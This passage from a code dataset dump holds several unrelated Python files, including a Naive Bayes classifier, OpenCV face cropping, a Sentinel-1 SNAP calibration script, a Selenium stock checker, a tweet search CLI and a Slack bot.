list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(mean)\n \n\ndef digit_variance(X, y, digit):\n\t'''Calculates the variance for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The variance value of the digits for every pixel\n\t'''\n\tdigit_indices = []\n\tvariance = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of digit in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# append mean value of same feature of all digit samples in mean \n\t\tvariance.append(np.asarray(feature_values).var())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(variance)\n\nclass CustomNBClassifier(BaseEstimator, ClassifierMixin):\n\t\"\"\"Custom implementation Naive Bayes classifier\"\"\"\n\n\tdef __init__(self, use_unit_variance=False):\n\t\tself.X_mean_ = None\n\t\tself.use_unit_variance = use_unit_variance\n\t\tself.X_var_= None\n\n\n\tdef fit(self, X, y):\n\t\t\"\"\"\n\t\tThis should fit classifier. All the \"work\" should be done here.\n\t\tCalculates self.X_mean_ based on the mean\n\t\tfeature values in X for each class.\n\t\tself.X_mean_ becomes a numpy.ndarray of shape\n\t\t(n_classes, n_features)\n\t\tfit always returns self.\n\t\t\"\"\"\n\t\tself.y=y\n\t\tself.X_mean_ = np.empty((len(set(y)),X.shape[1]))\n\t\tself.X_var_ = np.empty((len(set(y)),X.shape[1]))\n\n\t\tfor i in range(len(set(y))):\n\t\t\tself.X_mean_[i]=digit_mean(X,y,i)\n\t\t\tself.X_var_[i]=digit_variance(X,y,i)\n\t\t\n\t\t#If use_unit_variance is True set variance for all classes to one\n\t\tif self.use_unit_variance:\n\t\t\tself.X_var_ = np.ones((X.shape[0],X.shape[1]))\n\t\tself.apriori = np.log(calculate_priors(X,y))\n\n\t\treturn self\n\n\n\tdef predict(self, X):\n\t\t\"\"\"\n\t\tMake predictions for X based on the\n\t\teuclidean distance from self.X_mean_\n\t\t\"\"\"\n\t\tself.posterior = np.empty((len(set(self.y)),))\n\t\tself.predicts = np.empty((X.shape[0],),dtype=np.int64)\n\t\tfor i,feutures in enumerate(X):\n\t\t\tfor c in range(len(set(self.y))):\n\t\t\t\tself.posterior[c] =self.apriori[c] + np.sum([gauss_prob(a,self.X_mean_[c][feaut_num],self.X_var_[c][feaut_num]) for feaut_num,a in enumerate(feutures)]) \n\n\t\t\tself.predicts[i] = np.argmax(self.posterior)\n\t\treturn self.predicts\n\n\tdef score(self, X, y):\n\t\t\"\"\"\n\t\tReturn accuracy score on the predictions\n\t\tfor X based on ground truth y\n\t\t\"\"\"\n\t\treturn accuracy_score(np.asarray(self.predict(X)),y)\n\t","repo_name":"savassif/Pattern-Recognition-NTUA","sub_path":"2nd/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14891609557","text":"import cv2\r\n\r\nclass FaceExtraction:\r\n def face_extraction(self):\r\n # img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\aadharCard.png\")\r\n img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\MiddleTier\\\\aadharCard.png\")\r\n # cv2.imshow(img)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\haarcascade_frontalface_alt.xml')\r\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces = img[y:y + h, x:x + w]\r\n cv2.imshow(\"face\", faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\face.jpg', faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\detcted.jpg', img)\r\n cv2.imshow('img', img)\r\n cv2.waitKey()","repo_name":"Shivam-Chaubey/autokyc","sub_path":"AadharCardProcessing/faceExtract.py","file_name":"faceExtract.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30510615826","text":"#\r\n# This file is part of Efforia project.\r\n#\r\n# Copyright (C) 2011-2013 William Oliveira de Lagos \r\n#\r\n# Efforia is free software: you can redistribute it and/or modify\r\n# it under the terms of the Lesser GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Efforia is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Lesser General Public License\r\n# along with Efforia. If not, see .\r\n#\r\n\r\nfrom django import forms\r\nfrom crispy_forms.helper import FormHelper\r\nfrom crispy_forms.layout import Layout, Div, Hidden, HTML, Field\r\n\r\nclass PhotoForm(forms.Form):\r\n file = forms.FileField(label='')\r\n redirect = forms.CharField(label='')\r\n def __init__(self, *args, **kwargs):\r\n self.helper = FormHelper()\r\n self.helper.form_action = '/efforia/photo'\r\n self.helper.layout = Layout(\r\n Hidden('redirect',value='1'),\r\n Field('file',style='opacity:0; width:0; height:0',css_class='file'),\r\n Div(HTML(\"\"),css_class='upload')\r\n )\r\n super(PhotoForm, self).__init__(*args, **kwargs)\r\n","repo_name":"williamlagos/django-coding","sub_path":"pandora-hub/pandora/hub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72901408430","text":"\nfrom kubernetes import client, config\nimport time\nimport pandas as pd\n\ndef metricsCpu():\n try:\n config.load_kube_config()\n api = client.CustomObjectsApi()\n cpu = 0\n memory = 0\n cpul =[]\n memoryl = []\n k8s_nodes = api.list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n for stats in k8s_nodes['items']:\n if 'nginx' in stats['metadata']['name']: \n #print(\"Node Name: %s\" % (stats['metadata']['name']))\n #print(stats)\n for c in stats['containers']:\n cpul.append(int(c['usage']['cpu'].split('n')[0])/1000000)\n # memoryl.append(int(c['usage']['memory'].split('Ki')[0])*1024/1048576)\n cpu += int(c['usage']['cpu'].split('n')[0])\n # memory += int(c['usage']['memory'].split('Ki')[0])\n # print(cpul,memoryl)\n print(\"CPU: %s\\t\" %(max(cpul)))\n return max(cpul),0\n except:\n return 0,0\n\nmetricsCpu()\n\n","repo_name":"dj5/Kubernetes_Vertical_Pod_Autoscaling_Using_RL","sub_path":"rl/cpumemory.py","file_name":"cpumemory.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29032024888","text":"import os\n\nfrom entity.humod import Humod as HumodEntity\n\nfrom ..model import Model\nfrom .load import load\n\n\nclass Humod(Model):\n def __init__(self):\n self.omname = \"humod\"\n self.imname = \"\"\n self.ometype = HumodEntity\n\n def dotransform(self, store):\n src = getattr(store.env, \"src\", None)\n ctx = {\n \"base\": getattr(store.env, \"base\", os.getcwd()),\n \"verbose\": getattr(store.env, \"verbose\", False),\n # \"imodel\": src,\n \"omodel\": store.models[\"humod\"],\n \"store\": store,\n }\n load(src, ctx)\n","repo_name":"masol/bot","sub_path":"src/trans/humod/humod.py","file_name":"humod.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29365474600","text":"import random\n\n\nclass Dado:\n def __init__(self, min_vel=1, max_vel=6):\n self.min = min_vel\n self.min_original = min_vel\n self.max = max_vel\n self.max_original = max_vel\n\n def jogar(self, n_dados=1, separado=False):\n # Joga os dados no tabuleiro, sorteando um número entre o máximo e mínimo\n # Sorteia quando vezes for solicitado\n # Pode devolver só a soma dos sorteios ou o resultado individual de cada\n numeros = []\n result = 0\n x = 0\n while x < n_dados:\n x += 1\n numeros.append(int(random.uniform(self.min, self.max)))\n for x in numeros:\n result += x\n if not separado:\n return result\n elif separado:\n return result, numeros\n\n def altera_min_max(self, min_vel=0, max_vel=6):\n # Altera valor mínimo e máximo das faces\n self.min = min_vel\n self.max = max_vel\n\n def reseta_valores(self):\n # Reseta para valoeres originais\n self.min = self.min_original\n self.max = self.max_original\n\n\nclass Interacao:\n def __init__(self, dado_obj):\n self.dado = dado_obj\n self.individual = False\n\n def init(self):\n # Ao Iniciar o programa\n print('********************')\n print('*****DadoSystem*****')\n print('********************')\n print('Olá, bem vindo!')\n\n def tratar(self, string):\n # Tenta tranformar string em um inteiro, ou deixa a string toda e low\n result = string.lower()\n try:\n result = int(string)\n finally:\n return result\n\n def print_config_alteracao(self):\n # Print a explicação de como fazer a alteração dos valoeres mínimos e máximos dos dados\n print(\"-Em caso de dois valores separados por um espaço (' ') \"\n \"o primeiro será o valor mínimo e p segundo o valor máximo;\")\n print(\"-Em caso de um único valor, esse valor será inválido;\")\n print(\n f\"-Para alterar o valor máximo, coloque {self.dado.min} \"\n f\"(que é o atual valor mínimo), espaço e o novo valor máximo;\")\n print(\n f\"-Para alterar o valor mínimo, coloque o novo valor mínimo, espaço e {self.dado.max} \"\n f\"(que é o atual valor máximo);\")\n print(\"-Outras entradas são inválidas.\\n\")\n self.alterar_max_min()\n\n def alterar_max_min(self):\n # Altera valor mínimo e máximo das faces do dado\n result = input('Qual os valores? (e para explicação):')\n result = result.lower()\n if result == 'e':\n self.print_config_alteracao()\n else:\n result = result.split()\n result_tratado = []\n for x in result:\n x = self.tratar(x)\n if isinstance(x, int):\n result_tratado.append(x)\n else:\n result_tratado = 'Iválido'\n if result_tratado == 'Inválido':\n print('Inválido')\n else:\n min_vel, max_vel = self.desempacotar_alteracoes(result_tratado)\n self.dado.altera_min_max(min_vel, max_vel)\n print(f'Novo mínimo {self.dado.min}')\n print(f'Novo máximo {self.dado.max}')\n\n def desempacotar_alteracoes(self, vel):\n # Tenta desempacotar os valores alterados\n vel_1, vel_2 = 0, 0\n try:\n vel_1, vel_2 = vel\n except:\n print('Valore inválidos, operação falhou. Os valores foram resetados.')\n vel_1, vel_2 = self.dado.min_original, self.dado.max_original\n finally:\n return vel_1, vel_2\n\n def alterar_individual(self):\n # Altera se os valores viram separador ou não\n if not self.individual:\n self.individual = True\n print('Alteração realizada, agora você vera todos os resultados individuais.')\n elif self.individual:\n self.individual = False\n print('Alteração realizada, agora você não vera todos os resultados individuais.')\n\n def comandos(self):\n # Printa os comando disponíveis\n print(\"'' ou 'j' para Jogo simples;\")\n print(\"Número x para Jogar x vezes o dado;\")\n print(\"'a' para alterar máximo e mínimo dos valores das faces do dado;\")\n print(\"'i' para alterar se você quer ou não os valores individuais de cada jogada no tabuleiro;\")\n print(\"'e' para sair;\")\n print(\"'c' para ver os comandos.\")\n self.entrada_usuario()\n\n def entrada_usuario(self):\n # Faz a entrada do usuário, aceita comandos\n answer = input(\"Deseja jogar os dados ou alterar o valores?: \\n('c' para ver comandos)\\n\")\n answer = self.tratar(answer)\n\n if answer == \"\" or answer == \"j\" or answer == ' ':\n result = self.dado.jogar(separado=self.individual)\n return result\n elif isinstance(answer, int):\n result = self.dado.jogar(n_dados=answer, separado=self.individual)\n return result\n elif answer == 'a':\n self.alterar_max_min()\n elif answer == \"e\":\n return False\n elif answer == 'i':\n self.alterar_individual()\n elif answer == 'c':\n self.comandos()\n else:\n print('Não entendi.')\n\n\nif __name__ == '__main__':\n dado = Dado()\n inter = Interacao(dado)\n inter.init()\n\n while True:\n play = inter.entrada_usuario()\n if play is None:\n pass\n elif play is False:\n break\n else:\n print(f'Os dados deram {play}')\n","repo_name":"RafaelKC/Dados_de_Tabuleiro","sub_path":"dados_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"27599414435","text":"#!/usr/bin/env python3.6\n\n# Applies Radiometric Calibration and Terrain Correction using ESA SNAP python wrapper to a single GRD product\n\nimport os\nimport re\nimport gc\nimport shutil\nimport argparse\nimport zipfile\nimport fiona\nimport shapely.geometry\nimport snappy\nfrom snappy import ProductIO\nfrom snappy import HashMap\nfrom snappy import GPF\n\nallowed_polarizations = ['HH', 'HV', 'VH', 'VV']\n\ndef main(infolder=False, outfolder=False, polarization=False, basename=False,\n wktstring=False, shapefile=False, pixel_spacing=100, db=False, cleanup=False, unzip=False):\n '''main loop for generating calibration products. infolder can be a folder of .SAF/zip files or a .SAFE/zip file'''\n print('--------------------------------\\nRunning Extraction and Calibration over:{}'.format(infolder))\n if shapefile:\n wktstring = get_wkt_from_shapefile(shapefile)\n if db:\n print('output products will be generated in decibels.')\n infolder = unzip_check(infolder, cleanup) # unzip if required\n # determine if we need to walk the dir\n if infolder is False or not os.path.exists(infolder):\n raise Exception('must provide valid input path.')\n if contains_valid_product(infolder, polarization):\n # process the file\n calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n elif os.path.isdir(infolder):\n #see if we can process any subfolders\n for item in os.listdir(infolder):\n folder_path = os.path.join(infolder, item)\n subfolder = unzip_check(folder_path, cleanup)\n if contains_valid_product(subfolder, polarization):\n calibrate_file(subfolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n\ndef unzip_check(path, cleanup):\n '''checks the path to see if it's a valid zip file. If true, will unzip and return path to new folder.\n if False, will return the path.'''\n if path.lower().endswith('zip') and zipfile.is_zipfile(path):\n # extract the file\n filename = os.path.basename(path)\n base = os.path.splitext(filename)[0] + '.SAFE'\n folder = os.path.dirname(path)\n output_path = os.path.join(folder, base)\n if os.path.exists(output_path):\n return output_path # don't extract if the folder already exists\n print('extracting {}...'.format(filename))\n with zipfile.ZipFile(path,\"r\") as zip_ref:\n zip_ref.extractall(folder)\n if cleanup:\n os.remove(path)\n return output_path\n return path\n\ndef contains_valid_product(path, polarization):\n '''checks to see if the given directory contains a valid .tiff GRD file with the optional polarization'''\n if not os.path.isdir(path):\n return False\n meas_dir = os.path.join(path, 'measurement')\n if not 'measurement' in os.listdir(path) or not os.path.isdir(meas_dir):\n return False\n regex = 's1.*-grd-.*.tiff'\n if polarization:\n regex = 's1.*-grd-{}-.*.tiff'.format(polarization.lower())\n for fil in os.listdir(meas_dir):\n print('checking {}'.format(fil))\n if bool(re.search(regex, fil.lower())):\n return True\n return False\n\ndef get_wkt_from_shapefile(shapefile_path):\n '''returns the wkt string from the input shapefile'''\n if not os.path.exists(shapefile_path):\n raise Exception(\"invalid shapefile path: {}\".format(shapefile_path))\n c = fiona.open(shapefile_path)\n collection = [ shapely.geometry.shape(item['geometry']) for item in c ]\n return [j.wkt for j in collection][0]\n\ndef calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup):\n '''calibrate input product'''\n print('--------------------------\\nCalibrating product: {}'.format(infolder))\n if outfolder is False:\n outfolder = os.path.join(os.getcwd(), 's1_preprocessed')\n if not os.path.exists(outfolder):\n os.makedirs(outfolder)\n assert polarization in allowed_polarizations\n if polarization is False:\n polarization = ['HH', 'HV', 'VH', 'VV']\n else:\n polarization = [polarization]\n if wktstring is False:\n wktstring = 'POLYGON ((-94.3242680177268 -68.1554115901846,-94.4799907148995 -78.0386897518533,-133.488922458484 -75.1093782424761,-116.988045118527 -66.0302485803105,-94.3242680177268 -68.1554115901846))'\n\n GPF.getDefaultInstance().getOperatorSpiRegistry().loadOperatorSpis()\n HashMap = snappy.jpy.get_type('java.util.HashMap')\n gc.enable()\n\n # build folder paths\n folder = os.path.basename(infolder)\n for pol in polarization:\n\n if basename is False:\n print(\"folder: {}\".format(folder))\n basename = os.path.basename(folder).rstrip('.SAFE')\n calib = os.path.join(outfolder, '{}.{}.{}.calibrated'.format(basename, pol, pixel_spacing)) \n subset = os.path.join(outfolder, '{}.{}.{}.subset'.format(basename, pol, pixel_spacing))\n terrain = os.path.join(outfolder, '{}.{}.{}.corrected'.format(basename, pol, pixel_spacing))\n \n # read product\n sentinel_1 = ProductIO.readProduct(os.path.join(infolder, \"manifest.safe\")) \n\n ### CALIBRATION\n parameters = HashMap() \n parameters.put('outputSigmaBand', True) \n parameters.put('sourceBands', 'Intensity_' + pol) \n parameters.put('selectedPolarisations', pol) \n parameters.put('outputImageScaleInDb', db) \n print('Applying radiometric correction: {}'.format(calib))\n target_0 = GPF.createProduct(\"Calibration\", parameters, sentinel_1) \n ProductIO.writeProduct(target_0, calib, 'BEAM-DIMAP')\n \n ### SUBSET\n calibration = ProductIO.readProduct(calib + \".dim\") \n WKTReader = snappy.jpy.get_type('com.vividsolutions.jts.io.WKTReader') \n geom = WKTReader().read(wktstring)\n parameters = HashMap()\n parameters.put('geoRegion', geom)\n parameters.put('outputImageScaleInDb', db)\n print('Generating subset file: {}'.format(subset))\n target_1 = GPF.createProduct(\"Subset\", parameters, calibration)\n ProductIO.writeProduct(target_1, subset, 'BEAM-DIMAP')\n \n ### TERRAIN CORRECTION\n parameters = HashMap() \n parameters.put('demResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('imgResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('demName', 'GETASSE30') \n parameters.put('pixelSpacingInMeter', pixel_spacing) \n parameters.put('sourceBands', 'Sigma0_' + pol)\n print('Applying terrain correction: {}'.format(terrain)) \n target_2 = GPF.createProduct(\"Terrain-Correction\", parameters, target_1) \n ProductIO.writeProduct(target_2, terrain, 'GeoTIFF')\n \n del target_0\n del target_1\n del target_2\n if cleanup is True:\n os.remove(calib + '.dim')\n os.remove(subset + '.dim')\n shutil.rmtree(subset + '.data')\n shutil.rmtree(calib + '.data')\n if cleanup:\n shutil.rmtree(infolder)\n\ndef parser():\n '''\n Construct a parser to parse arguments, returns the parser\n '''\n parse = argparse.ArgumentParser(description=\"Apply radiometric and terrain corrections\")\n parse.add_argument(\"--infolder\", required=True, default=False, help=\"input S1 GRD folder\")\n parse.add_argument(\"--outfolder\", required=False, default=False, help=\"output folder for calibrated products\")\n parse.add_argument(\"--polarization\", required=False, default='HH', choices=['HH','VV','VH','HV'], help=\"polarization to process.\")\n parse.add_argument(\"--basename\", required=False, default=False, help=\"base folder/filename to use for output products\")\n parse.add_argument(\"--wkt\", required=False, default=False, help=\"wkt polygon bounds\")\n parse.add_argument(\"--shapefile\", required=False, default=False, help=\"shapefile for bounds\")\n parse.add_argument(\"--pixel_spacing\", required=False, default=100, type=float, help=\"Pixel spacing in meters\")\n parse.add_argument(\"--in_decibels\", action=\"store_true\", help=\"output is scaled in decibels\")\n parse.add_argument(\"--unzip\", action=\"store_true\", help=\"will extract zipped files\")\n parse.add_argument(\"--cleanup\", action=\"store_true\", help=\"cleanup intermediate files\")\n return parse\n\nif __name__ == '__main__':\n args = parser().parse_args()\n main(infolder=args.infolder, outfolder=args.outfolder, polarization=args.polarization,\n basename=args.basename, wktstring=args.wkt, shapefile=args.shapefile,\n pixel_spacing=args.pixel_spacing, db=args.in_decibels, cleanup=args.cleanup, unzip=args.unzip)\n","repo_name":"jlinick/S1GRD_TS","sub_path":"calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20294254065","text":"n, m = map(int, input().split())\r\nmemo = list(list(-1 for i in range(j+1)) for j in range(n+1))\r\nmemo[0][0] = 1\r\nmemo[1][0] = 1\r\nmemo[1][1] = 1\r\nfor i in range(2, n+1):\r\n for j in range(0, i+1):\r\n if j == 0 or j == i:\r\n memo[i][j] = 1\r\n else:\r\n memo[i][j] = memo[i-1][j] + memo[i-1][j-1]\r\nprint(\"%d\" % (memo[n][m]))","repo_name":"SHL0915/BOJ_Problem_Solving","sub_path":"백준/Silver/2407. 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15100792118","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nf = open(\"WomenShoesLinks_v1.0.1.txt\")\nline = f.readline()\nf.close()\n\noptions = Options()\noptions.headless = True\n\ndriver = webdriver.Chrome(options=options)\ndriver.get(line)\n\nstateCookieBanner = False #not closed\n\nwhile stateCookieBanner == False:\n try:\n # Wait for cookie message\n close_icon = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n close_icon.click()\n # Wait for cookie message to disappear\n WebDriverWait(driver, 10).until(ec.invisibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n stateCookieBanner = True\n print(\"\\nCookie banner closed\\n\")\n except Exception as e:\n print(\"\\nCookie banner closed\\n\")\n\nfind_in_store_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"pdp-store-stock-checker-link\"]')))\nfind_in_store_btn.click()\n\nproduct_size_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR,'#pdp-store-stock-checker-app-container > div > aside > div > section > form > div.size-selector > ul > li:nth-child(1) > button')))\nproduct_size_btn.click()\n\nlocation_inp = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/div[2]/div/input')))\nlocation_inp.send_keys('London')\n\ncheck_availability_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/button')))\ncheck_availability_btn.click()\n\nclose_bag = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR, '#pdp-store-stock-checker-app-container > div > aside > div > section > section.store-stock-checker__section.store-stock-checker__popup.store-stock-checker__popup--visible > div > button.reset-btn.icon-ui-close.store-stock-checker__popup-close')))\nclose_bag.click()\n\nlocation_list = driver.find_element_by_xpath('//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/section[2]/ul')\nlocations = location_list.find_elements_by_tag_name('li')\nfor location in locations:\n text = location.text\n print(text)\n\nf = open(\"ProductLocation.txt\", \"x\")\nf = open(\"ProductLocation.txt\", \"a\")\nfor location in locations:\n text = location.text\n f.write(text + \"\\n\\n\")\n \nf.close()\n\ndriver.quit()\n\n\n\n","repo_name":"OmarSaidIbrahim/python-web-automatation-selenium","sub_path":"automata-versions/automatation_v1.0.1.py","file_name":"automatation_v1.0.1.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"13467327116","text":"from index import Index\nfrom score import rank_tweets, CustomScorer, rank_tweets_diversity, Word2VecScorer\nfrom query import Query\nfrom pathlib import Path\nimport argparse\nimport csv\n\nDEFAULT_TWEETS = Path(__file__).parent.parent/'res'/'merge_tweets_wusers.json'\n\ndef parse_main_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-index', default=None, help='Path to load index .pickle file')\n group.add_argument('-tweets', default=DEFAULT_TWEETS, help='Path to load json tweet data')\n parser.add_argument('-K', type=int, default=20, help='Maximum ranking length')\n parser.add_argument('-out', default=None, help='Path to output tsv query rankings')\n rmethod = parser.add_mutually_exclusive_group()\n rmethod.add_argument('-w2v', action='store_true', help='Use word2vec scoring')\n rmethod.add_argument('-custom', action='store_true', help='Use custom scoring (use likes and retweets)')\n rmethod.add_argument('-diversity', action='store_true', help='Use diversified output')\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = parse_main_args()\n\n if args.index != None:\n print('Loading index...')\n index = Index.load(args.index)\n else:\n index = Index()\n print('Loading tweet info into index...')\n index.load_json_tweets(args.tweets)\n\n stop = False\n scorer = None\n if args.w2v:\n scorer = Word2VecScorer(index.tweets.values())\n if args.custom:\n scorer = CustomScorer(index)\n\n ranker = rank_tweets if not args.diversity else rank_tweets_diversity\n\n while not stop:\n str_query = input('Write a query: ')\n query = Query(str_query)\n output = []\n for i, tweet in enumerate(ranker(query, index, K=args.K, scorer=scorer)):\n print(i+1, '.\\n', '-'*100)\n print(str(tweet))\n output.append(tweet)\n if args.out != None:\n with open(args.out, 'at') as out_file:\n tsv_writer = csv.writer(out_file, delimiter='\\t')\n tsv_writer.writerow(['query', str_query])\n for tweet in output:\n tsv_writer.writerow(tweet.row_data())\n","repo_name":"idraveUPF/information_retrieval_final_project","sub_path":"search-engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20017477180","text":"from ._version import __version__ # noqa: F401\nfrom ._cli import Command, Argument # noqa: F401\nfrom ._precept import Precept # noqa: F401\nfrom ._tools import AutoNameEnum, is_windows # noqa: F401, F403\nfrom ._immutable import ImmutableProp, ImmutableDict, ImmutableMeta # noqa: F401, F403, E501\nfrom ._configs import ( # noqa: F401\n ConfigProperty, Config, ConfigFormat, Nestable, config_factory\n)\nfrom ._executor import AsyncExecutor # noqa: F401\nfrom ._services import Service # noqa: F401\nfrom ._plugins import Plugin # noqa: F401\n\n\n__all__ = [\n '__version__',\n 'Command',\n 'Argument',\n 'Precept',\n 'ImmutableDict',\n 'ImmutableMeta',\n 'ImmutableProp',\n 'ConfigProperty',\n 'Config',\n 'ConfigFormat',\n 'Nestable',\n 'config_factory',\n 'AsyncExecutor',\n 'Service',\n 'Plugin',\n 'is_windows',\n 'AutoNameEnum'\n]\n","repo_name":"T4rk1n/precept","sub_path":"precept/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"31329540507","text":"import os\nimport time\nimport re\nimport slack\nimport network\nfrom dotenv import load_dotenv\n\n#load env variables\nload_dotenv()\n\n#setup RTM client\nslack_token = os.getenv(\"SLACK_BOT_TOKEN\")\nrtm_client = slack.RTMClient(token=slack_token)\nweb_client = slack.WebClient(slack_token)\nmendicant_id = web_client.api_call(\"auth.test\")[\"user_id\"]\nchannels = {} \n\n@slack.RTMClient.run_on(event='message')\ndef unpack_payload(**payload):\n \"\"\"\n executes bot command if teh command is known\n \"\"\"\n data = payload['data']\n \n if \"subtype\" in data:\n return\n\n web_client = payload['web_client']\n \n command_tokens = tokenize_command(data['text'])\n module = route_command(data, web_client)\n text = module(command_tokens)\n web_client.chat_postMessage(channel=data['channel'], text=text)\n\ndef route_command(data, webclient):\n channel = data['channel']\n\n switcher={\n channels['network']:network.handle_command \n }\n\n return switcher.get(channel, invalid_module)\n\ndef tokenize_command(command_string):\n\treturn command_string.split()\n\ndef invalid_module():\n return \"I'm sorry Reclaimer, I don't have subroutines for that module\"\nif __name__ == \"__main__\":\n convo_list = web_client.api_call(\"conversations.list\")\n channels = {channel['name']: channel['id'] for channel in convo_list['channels']}\n rtm_client.start()\n\n","repo_name":"PogopunkXIII/mendicant-bias","sub_path":"mendicant_bias.py","file_name":"mendicant_bias.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26047424162","text":"import pandas as pd\r\nfrom create_tfrecord import tfrecord\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef label_transfer(dataset_dir):\r\n\r\n #convert label from 5 classes to 2 classes\r\n\r\n train_dir = os.path.join(dataset_dir, r\"labels\\train.csv\")\r\n test_dir = os.path.join(dataset_dir, r\"labels\\test.csv\")\r\n\r\n df_train = pd.read_csv(train_dir)\r\n df_test = pd.read_csv(test_dir)\r\n\r\n for index, row in df_train.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_train.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_train.loc[index, 'Retinopathy grade'] = 1\r\n\r\n for index, row in df_test.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_test.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_test.loc[index, 'Retinopathy grade'] = 1\r\n df_train.to_csv(os.path.join(dataset_dir, r\"train_binary.csv\"), index=False)\r\n df_test.to_csv(os.path.join(dataset_dir, r\"test_binary.csv\"), index=False)\r\n return df_train, df_test\r\n\r\ndef EDA(data):\r\n\r\n #Visualize dataset distribution\r\n\r\n data = data['Retinopathy grade']\r\n data_value = data.value_counts()\r\n plt.bar(data_value.index, data_value)\r\n plt.xticks(data_value.index, data_value.index.values)\r\n plt.xlabel(\"labels\")\r\n 